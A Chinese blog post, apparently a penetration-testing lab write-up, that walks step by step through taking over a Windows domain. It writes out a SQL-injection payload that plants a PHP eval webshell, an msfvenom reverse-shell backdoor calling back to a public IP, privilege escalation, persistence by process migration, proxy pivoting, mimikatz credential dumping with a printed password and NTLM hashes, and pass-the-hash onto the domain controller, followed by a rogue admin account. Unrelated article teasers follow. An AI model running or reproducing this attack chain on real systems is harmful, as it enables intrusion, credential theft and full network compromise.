msf如何内网信息收集,内网信息收集工具

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

【查看资料】

1、进去一看,典型的sql注入

 

2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

 

②蚁剑连接,发现权限很低

msf如何内网信息收集,内网信息收集工具

 

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么**,方法太多了)

kali**用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108

 

2、接着设置一下花生壳的配置

 

3、可以看到我们映射到公网的ip和端口

 

4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

msf如何内网信息收集,内网信息收集工具

 

4、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp

或者使用

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.108

set lport 6666

run

 

5、执行webshell中的木马

msf如何内网信息收集,内网信息收集工具

 

sessions 1 //进入会话

6、发现无法不是最高权限,getsystem/getprivs并未成功

msf如何内网信息收集,内网信息收集工具

 

7、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令

msf如何内网信息收集,内网信息收集工具

 

②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=103.46.128.46 lport=26240

msf如何内网信息收集,内网信息收集工具

 

③接着监听的那个msf窗口1就获得了一个system权限的会话

msf如何内网信息收集,内网信息收集工具

 

看路由器命令

route

msf如何内网信息收集,内网信息收集工具

 

一般为了防止后门被人关掉,将其注入到其他程序中

ps 查看进程pid

msf如何内网信息收集,内网信息收集工具

 

接着用migrate将我们后门注入到1816中,有效防止木马挂了

migrate 1816

msf如何内网信息收集,内网信息收集工具

 

通过shell命令进入命令窗口

msf如何内网信息收集,内网信息收集工具

 

内网信息收集

可以通过ifconfig看到内网ip

msf如何内网信息收集,内网信息收集工具

 

接着利用后渗透工具ping方法扫一下ip段,接着扫出三个ip存活

info post/multi/gather/ping_sweep //查看所需参数

run post/multi/gather/ping_sweep rhosts=10.0.1.4/24 //扫网段

msf如何内网信息收集,内网信息收集工具

 

还有一种方法,arp扫ip段,用法差不多,这个扫得快一些比较推荐

run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

msf如何内网信息收集,内网信息收集工具

 

这是利用msf自带工具扫描,接下来再演示使用nmap扫一下看看

首先添加一个路由如下命令

run get_local_subnets //查看网段

run autoroute -s 10.0.1.0/24

run autoroute -p //查看已添加的路由

background //保存session返回msf

msf如何内网信息收集,内网信息收集工具

 

接着开启socks4a服务,使用msf的辅助模块

use auxiliary/server/socks_proxy

set VERSION 4a //设置为socks4a

run

msf如何内网信息收集,内网信息收集工具

 

接着设置/etc/proxychains.conf 中的内容改为下面展示截图,kali自带的代理工具

vim /etc/proxychains.conf

msf如何内网信息收集,内网信息收集工具

 

接着我们就可以利用proxychains4来进行连接3389端口,和进行内网ip段扫描,使用nmap扫描其内网ip及其端口等,但是扫的真的慢是我网太卡了么。

proxychains4 nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

msf如何内网信息收集,内网信息收集工具

 

看到好多445端口,这里其实可以用永恒之蓝的

当然,也可以选择不用nmap扫描端口,我们可以用msf的模块扫描端口

use auxiliary/scanner/portscan/tcp 

set rhosts 10.0.1.6

msf如何内网信息收集,内网信息收集工具

 

kali机用kiwi抓取密码

也可以直接抓取管理员密码

msf提供一些后渗透的模块

load -l 来查看有哪些模块

msf如何内网信息收集,内网信息收集工具

 

其实kiwi就是mimikatz就是换了个名在这里,然后加载kiwi

msf如何内网信息收集,内网信息收集工具

 

查看当前kiwi的命令用help

help

msf如何内网信息收集,内网信息收集工具

 

对10.0.1.4机子进行抓密码,接着执行下面命令,就可以获取管理员密码,这个是对登陆过的账号和密码进行抓取

kiwi_cmd privilege::debug

kiwi_cmd sekurlsa::logonpasswords

msf如何内网信息收集,内网信息收集工具

 

获得密码

u:administrator

p:woshifengge1.

kali机hash传递得到会话

看到445端口就可以尝试hash传递,在不需要密码的情况下使用,发现10.0.1.6-10.0.1.8可以被利用

hashdump可获取hash值,得是64位系统权限才可执行

hashdump 

或者是 

run post/windows/gather/hashdump

或者是

run  post/windows/gather/smart_hashdump

以上都可以获取hash值



background 返回

msf如何内网信息收集,内网信息收集工具

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::

通过网段知道6-8有445可以利用smb的hash传递连接10.0.1.8这台机子,因为一般情况几台机子的密码都相同。

use exploit/windows/smb/psexec

set payload windows/meterpreter/bind_tcp 

//正向连接

set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83  #hashdump获取的hash值进行

msf如何内网信息收集,内网信息收集工具

 

msf如何内网信息收集,内网信息收集工具

 

这里发现10.0.1.8这台机子存在域控,dns一般是和域控绑定在一个服务器上的

shell

ipconfig /all

msf如何内网信息收集,内网信息收集工具

 

shell查看域的命令

shell中命令使用查看是否存在域的方法

这里明显A1这台机子处于域中

1、查看域中计算机

net view //查看域中的计算机

msf如何内网信息收集,内网信息收集工具

 

net view /domain //查看域

msf如何内网信息收集,内网信息收集工具

 

根据ipconfig /all 可以知道域控主机的ip是10.0.1.6

hash传递并不能登陆进去

2、查看域中的计算机

就一台A1,这里我们得通过A1去获得域控

net view /domain:ZKAQ

msf如何内网信息收集,内网信息收集工具

 

3、ping计算机名可以得到IP

ping A1

msf如何内网信息收集,内网信息收集工具

 

ping zkaq.cn

msf如何内网信息收集,内网信息收集工具

 

4、获得所有域的用户列表,有一个krbtgt就是域用户

net user /domain

msf如何内网信息收集,内网信息收集工具

 

5、获取域用户组信息

net group /domain

msf如何内网信息收集,内网信息收集工具

 

6、获取当前域管理员信息

net group "domain admins" /domain

msf如何内网信息收集,内网信息收集工具

 

7、查看域时间及域服务器的名字

net time /domain

msf如何内网信息收集,内网信息收集工具

 

通过域的信息收集得到DC.zkaq.cn 10.0.1.6这个就是域控

拓展,导入kiwi的命令使用

msf如何内网信息收集,内网信息收集工具

 

1、msv列出NTLM

kiwi_cmd sekurlsa::msv

msf如何内网信息收集,内网信息收集工具

 

2、kerberos抓密码,发现全部加密了

kiwi_cmd sekurlsa::kerberos

msf如何内网信息收集,内网信息收集工具

 

3、也可以用creds_all抓取密码,但也明显加密

creds_all

msf如何内网信息收集,内网信息收集工具

 

Username       Domain  NTLM

--------       ------  ----

A1$            ZKAQ    3bf63ae494aee3a74fa90a41b9459df9

Administrator  ZKAQ    61465a991b168727b65b3644aab823cd 

Administrator  A1      4d1de63584701c85b8b9eccf5243ef83

Impacket实现域控NTML的hash传递

这里发现密码是无法获取的,因为NTLM是密文,我们可以使用hash传递,不过这里得使用Impacket的包

首先我们要先去GitHub下载源码,或者直接使用

git clone 

然后解压缩,进入impacket

cd impacket/

然后运行

python setup.py install

工具都在这个目录里impacket/examples

cd impacket/examples

msf如何内网信息收集,内网信息收集工具

 

接着我们使用smbexec.py这个模块,用上面的ntml值hash传递登陆域控机子

proxychains4 python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6

成功拿下域控的超级管理员权限

msf如何内网信息收集,内网信息收集工具

 

接下来是基础操作添加超管账号,然后登陆域控

net user gylq ********** /add #密码打长的,2008有限制,密码不能太简单

net localgroup administrators gylq /add #添加超管

msf如何内网信息收集,内网信息收集工具

 

直接代理登陆域控10.0.1.6就报错,这是域控机的守护机制

msf如何内网信息收集,内网信息收集工具

 

需要使用他域内的机子去登陆,我们先登陆10.0.1.8,再登陆域控

远程3389登陆域控

也可以用直接用抓取的密码来代理登陆3389的端口等,只是演示一下

如果对方没有开启远程连接,可以使用msf自带命令启动

run getgui -e

先登陆10.0.1.4,才发现这个不是域内机子,得去登陆10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.4

msf如何内网信息收集,内网信息收集工具

 

也可以用代理直接连接10.0.1.8,来进行确定

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

接着用10.0.1.8作为跳板登陆10.0.1.6,即域控机子

msf如何内网信息收集,内网信息收集工具

 

成功登陆域控

msf如何内网信息收集,内网信息收集工具

 

总结:这是kali中使用msf和impacket联合拿域控

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/326457.html

(0)

相关推荐

  • 梅岭怎么去(冬天去梅岭好玩吗)

    悄悄地 南昌的太阳来了 但是 南昌的温度并没有升高很多啊 肆起的妖风 吹得瑟瑟发抖~ 是时候拿出我的杀手锏了 大表哥强烈推荐 南昌几个好玩的地方 趁着周末可以和家人朋友约起! 金燕国际温泉酒店 金燕国际温泉酒店, 南昌近郊唯一五星级的 大型温泉旅游项目, 距离南昌市区仅20公里。 秉承着中国传统温泉文化,根据“赏金燕八景,泡万寿十汤,享千年灵气”的十五字方针…

    2021-12-22
  • ios9.0下载,ios9020-1994

    5月31日凌晨,苹果总算是公布了WWDC的宣传海报,表示将会在6月6日凌晨1点正式开幕。 (图片来源:苹果官网) 说实话,大部分消费者对苹果这场活动提不起太大兴趣,毕竟他们关注的iPhone 15系列要等到今年9月份左右才会发布。但从今天的海报来看,苹果很有可能要搞出一波大新闻,而且很有可能是一款能够改变整个行业的产品。 苹果MR,会是重磅**吗? 此次海报…

    2023-07-05
  • 谷歌广告联盟(谷歌广告联盟挂机项目)

    谷歌广告联盟(谷歌广告联盟挂机项目)谷歌广告联盟(谷歌广告联盟挂机项目)谷歌广告联盟(谷歌广告联盟挂机项目)谷歌广告联盟(谷歌广告联盟挂机项目)

    今天,在我们谈论互联网时,我们有必要清晰的知道——参考36氪的说法,互联网在中国已经可以被分为“消费互联网”和“产业互联网”两极。 前者,主要面向2C,核心是流量的聚合、分发和让流量和C端交易消费之间的匹配变得更高效。 而后者,则主要面向2B,核心是数字化、智能化,以及垂直产业在生产、供应链侧的整合、优化和全面效率提升 而这一篇连载文,我想要试着聊一点非常本…

    2022-01-27 投稿
  • 2021世界杯欧洲区赛程表(欧洲杯2021赛程时间表)

    直播吧12月8日讯 今天凌晨,2022年卡塔尔世界杯欧洲杯预选赛抽签在苏黎世进行。55支球队将分成10个小组,争夺13个出线名额,其中10个小组第一直接出线,剩余3个名额将由附加赛决出(下文有介绍)。 2022世界杯欧预赛抽签结果: A组:葡萄牙、塞尔维亚、爱尔兰、卢森堡、阿塞拜疆 B组:西班牙、瑞典、希腊、格鲁吉亚、科索沃 C组:意大利、瑞士、北爱尔兰、保…

    2022-01-01
  • 简历校园经历(校园经历简历示范30字)

    简历校园经历(校园经历简历示范30字)简历校园经历(校园经历简历示范30字)简历校园经历(校园经历简历示范30字)简历校园经历(校园经历简历示范30字)

    在校大学生工作经历应该尽量写与你投递岗位所需能力相同的经历,可以按照以下顺序书写: 1. 与投递岗位相同或相近的见习、实习经历。在经历中写清楚通过见习或实习,你学习到了什么,对岗位认识有没有提升,有没有掌握岗位需要的技能。 如:我曾经在暑假回自己家开的小卖部帮妈妈守了一个月店,在这一个月时间里,每天负责售货,进货,记账等工作。从中我学到了毛利润和纯利润的区别…

    2023-02-14 投稿
  • 石斑鱼的禁忌(石斑鱼的功效与作用禁忌)

    石斑鱼的禁忌(石斑鱼的功效与作用禁忌)石斑鱼的禁忌(石斑鱼的功效与作用禁忌)石斑鱼的禁忌(石斑鱼的功效与作用禁忌)石斑鱼的禁忌(石斑鱼的功效与作用禁忌)

    大暑,是今年夏季最后一个节气,虽然在中伏之前,但却是全年中最热的阶段。自古以来,人们都讲究在大暑节气养生,因各个地区风俗、饮食习惯不同,在大暑当天,台州人喜欢吃姜汁调蛋、莆田人会吃羊肉和荔枝、浙江人则会吃石斑鱼。 但在这里提醒大家,大暑吃石斑鱼谨防食物中毒。据2016年5月份的一项报道,因蒋先生早上在河里捕捉了一条石斑鱼,回家四口人吃了后,相继出现腹泻、腹痛…

    2022-05-07 投稿
  • 怎么上淘宝官网买东西(如何上淘宝网买东西)

    淘宝官宣了表情购物的新功能,以后上淘宝买东西也能用emoji来搜索。emoji就是表情符号,词源来自日语词汇“絵文字”。漫画家会画出一些表情,表现人的喜怒哀乐等情感或事情等等。现在,人们经常会在日常网络交流中使用emoji表情符,表达自己的想法。 淘宝推出emoji购物新功能 据官方介绍,用户在使用淘宝APP时,可以在首页的搜索框内直接输入代表自己心情的Em…

    2021-12-12
  • 迎接白衣天使凯旋归来的句子

    迎接白衣天使凯旋归来的句子迎接白衣天使凯旋归来的句子迎接白衣天使凯旋归来的句子迎接白衣天使凯旋归来的句子

      1、白衣执甲护荆楚,山河无恙携春归。 2、武汉的曹大姐,是负责江汉方舱医院移动厕所清洁消杀的环卫工人。如今她已结束隔离,回到原本的保洁岗位。一直都没告诉儿子方舱经历的她说:“当时我是第一个报名的!能顺利回家我很高兴。来是勇敢者,回家了就是胜利者! 3、欢迎抗疫英雄平安回家!致敬英雄! 4、为逆行者点赞!13家北京市属医院,138名医疗人员,65…

    2023-07-04 投稿
  • 陪你一起好好吃饭小说原著(陪你一起好好吃饭剧情分集介绍)

    陪你一起好好吃饭小说原著(陪你一起好好吃饭剧情分集介绍)陪你一起好好吃饭小说原著(陪你一起好好吃饭剧情分集介绍)陪你一起好好吃饭小说原著(陪你一起好好吃饭剧情分集介绍)陪你一起好好吃饭小说原著(陪你一起好好吃饭剧情分集介绍)

      上周情人节当天,湖南卫视&芒果TV上线甜爱剧《陪你一起好好吃饭》,将浪漫氛围直接拉满。该剧由高瀚宇、郑湫泓领衔主演,讲述生活中只有工作的霸道总裁和热爱生活、拒绝内卷的温柔下属通过美食逐渐了解、相互治愈的暖心故事。郑湫泓在其中饰演美食小能手苏可岚,一个虽然临危受命,但依然把工作完成的很出色的公关总监。   快节奏恋爱剧,让人不断…

    2022-03-20 投稿
  • 居家隔离是什么意思家人怎么办(居家隔离门上要贴封条吗)

    居家健康监测和居家隔离 有什么不一样呢? 我们又该如何做好居家监测? 居家健康监测和居家隔离面向的人群不同,居家隔离针对暴露后感染风险较高的人群,比如来自境外及中高风险地区的人员、本地中高风险地区及封控区域的人群等,而居家健康监测则针对风险较低人群。 居家健康监测是待在家里,在乡镇(街道)、村(居)民委员会的指导下、管理下是可以和家人同吃同住的,居家健康监测…

    2021-12-22
  • 趣头条赚钱是真的吗(趣赚app赚钱是真的吗)

    趣头条赚钱是真的吗(趣赚app赚钱是真的吗)趣头条赚钱是真的吗(趣赚app赚钱是真的吗)趣头条赚钱是真的吗(趣赚app赚钱是真的吗)趣头条赚钱是真的吗(趣赚app赚钱是真的吗)

        趣头条的神话正经受前所未有的考验。   两年零三个月,这是趣头条从创立到上市的时间,比生猛的拼多多还快了整整半年。   超乎想象的崛起速度、惊人的流量规模都让无数业内人狠狠“酸”了一把。不过也许是看到趣头条从诞生起就摆脱不掉的“低俗营销、病毒传播”的死穴,人们一直冷眼静待它“楼塌”时刻的到来。   1…

    2022-01-27 投稿
  • 秘乐短视频警方回应(秘乐短视频合法吗 新闻)

    只需要一部手机,在某短视频平台不停点赞,就能“轻松赚钱”“月入过万”。近年来,一种打着“区块链”“短视频”等概念为幌子,以“0元看视频做任务赚钱”为噱头的传销活动层出不穷。执法部门统计出的数据更是触目惊心,发展的会员从数千万到数百万人不等。 经查明:2020年4月至2020年9月间,被告人卢某龙与被告人马某贤、雷某、曹某彬、时某辉等人共同计议后,由卢某龙负责…

    2023-01-31